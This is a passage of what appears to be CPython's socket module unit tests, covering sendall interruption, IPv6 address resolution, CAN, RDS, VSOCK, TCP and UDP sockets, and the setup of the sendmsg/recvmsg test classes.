def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
        # Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
        while True:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
        self.serv_conn.shutdown(2)  # 2 == socket.SHUT_RDWR
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
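# A minimal sketch of the composition described above (class names here are
# illustrative; the concrete socket-type bases appear further down in this
# module): a runnable test class is typically just an empty subclass mixing
# generic test logic with a socket-specific setup base, e.g.
#
#   class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
#       pass
#
# where the base maps the UDP cli/serv sockets to cli_sock/serv_sock and
# fills in destination addresses via sendmsg_to_server_defaults.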
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
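    # Example (a sketch): on a connectionless subclass, where
    # sendmsg_to_server_defaults is ([], [], 0, self.serv_addr), the call
    # sendmsgToServer([MSG]) expands to
    # self.cli_sock.sendmsg([MSG], [], 0, self.serv_addr).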
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
